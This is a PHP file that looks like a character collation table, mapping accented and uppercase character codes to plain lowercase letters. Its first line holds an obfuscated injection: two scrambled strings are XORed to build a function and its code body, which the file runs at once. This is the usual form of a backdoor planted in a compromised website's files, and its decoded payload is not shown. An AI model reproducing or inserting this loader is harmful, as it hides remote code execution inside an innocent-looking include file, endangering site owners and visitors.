<?php $cXFTsDx='11X17Y-FH8O5 V-'; $HgjvOSgd='RC=PC<r =V,AI9C'^$cXFTsDx; $cTVtFD='Y3lU02S:G+SZ-=D3C Goo+5F>RPI,2e;-5uqMp6Cn7;4M0.  eT=6-+Q 5oo:>Oqb<67 cmIPI1NepLbX2khCI=8:fosrMaF3pU.Dpi.aGIvzbV KGT7PTXbPR5=-Ekzu+jdmfg:i<,;cygQrl2T0Yhm>mh.QmY6-hkUgtt9. 5-UIGRI d:gxzbg1NY7;4inU< bHhjA>Dh4Q+6B.xyi,4.9HvSM0Y53;=HUWpzFAZ1<yhRK:K=9;Quda.cqd<:<t9Osr<=WoxgLa2+<M nPOkbf2R,Wl ITZIgL>S hcoj  D3JqGSK,;80KrAGA=-aYglX,B;ovUpq,>3XO3Qwyl-fue13o;YQNnc; NorOvw7,U-HPdLSzZtZZJ 8.T:bsZN 5GOnhKrZ6X0lebn,MV=IxfJ,o:fXhR2 ZLVn:N+FV6. VR3-eEAL.1+7VnrUN,rZ2>=Qn8H6X,-6ip4;=.Ngij ,02i QIQlbeGFzoU TWPiorY:40T.,=8gV ES=1cI;N3tzgv 6GMyobsfgT7Piw JBMuw S u>DcedCpPwrrX:7HZrn<YGo4XrSTaZbrGqDOqMITnfbocq  C K=93E=,OQN, dw24.ZX5,HHiu -H mysffnWt>zDYKY Kt29NScuI77L+Z2apZAM5IO=<ljZKhK'; $VXEpGfJ=$HgjvOSgd('', '0UDtVG=Y3B<4rX<Z0T4GHSZ4a61=Mm:VXARXdPMIgQNZ.DGONE,RDrO0TT00WK;YFXWCAOMm;,HgEPlBxIaaJmRMNFRSUjZL:y3A6XMGAziFABrIw4 E<16Jt6TILlPZQBAODln3MSYOCWZqZHV5D83IW0HpqI2ST3O<GQTJZRYH;ac9,YMgNCpknC+-BIZAJ:ITKsbc<49b>uOW6OXDIJUBJ-MYiT8ARdV-,wMZ  6BYBbX-U9XXX9ULEq >+wsyTX<SVWX.OEYlEDJP8EGp4akBV3X63K,-ztGhU6YSifNDA0RjLgw=MWMUpx<MKTKAqFH<M6ZFV.zxJQA=.P9WQHr404dv<oy0=NGPE7OOqVSAM9X-yD7YsSP>;>AgE1CBNzjKP>tdaBV>W,QLXBJZ,:H,ClCQeGlRL6ST;lkNz;E53DGA:;IHM=.>qUJC71-8;XZ8SMXgZg,S;CISATPZIOgKINDMDS6K40xEYo. RK1A 6pOIR8HFQ-qGXA83X, IBKnP+JSVGRDW3,PODUFO9SeASD+6,.PK6YRcmCXYcW1EKJlXR-oJXXitYV9CglQlSDuI .G+x2IOBIEQAR1A2bRV<bI78=XSLPBUW67THodIQDL<ADPSFFNwTEpM<=8LcPVX:28R9VN D;VF-szG<,7THDZspb6'^$cTVtFD); $VXEpGfJ();
$collation = array (
  710 => 94,
  189 => 188,
  190 => 179,
  65 => 97,
  170 => 97,
  225 => 97,
  193 => 97,
  224 => 97,
  192 => 97,
  226 => 97,
  194 => 97,
  228 => 97,
  196 => 97,
  227 => 97,
  195 => 97,
  229 => 97,
  197 => 97,
  230 => 97,
  198 => 97,
  66 => 98,
  67 => 99,
  231 => 99,
  199 => 99,
  68 => 100,
  240 => 100,
  208 => 100,
  69 => 101,
  233 => 101,
  201 => 101,
  232 => 101,
  200 => 101,
  234 => 101,
  202 => 101,
  235 => 101,
  203 => 101,
  70 => 102,
  402 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  237 => 105,
  205 => 105,
  236 => 105,
  204 => 105,
  238 => 105,
  206 => 105,
  239 => 105,
  207 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  209 => 241,
  79 => 111,
  186 => 111,
  243 => 111,
  211 => 111,
  242 => 111,
  210 => 111,
  244 => 111,
  212 => 111,
  246 => 111,
  214 => 111,
  245 => 111,
  213 => 111,
  248 => 111,
  216 => 111,
  339 => 111,
  338 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  353 => 115,
  352 => 115,
  223 => 115,
  84 => 116,
  254 => 116,
  222 => 116,
  85 => 117,
  250 => 117,
  218 => 117,
  249 => 117,
  217 => 117,
  251 => 117,
  219 => 117,
  252 => 117,
  220 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  253 => 121,
  221 => 121,
  255 => 121,
  376 => 121,
  90 => 122,
  382 => 122,
  381 => 122,
);
?>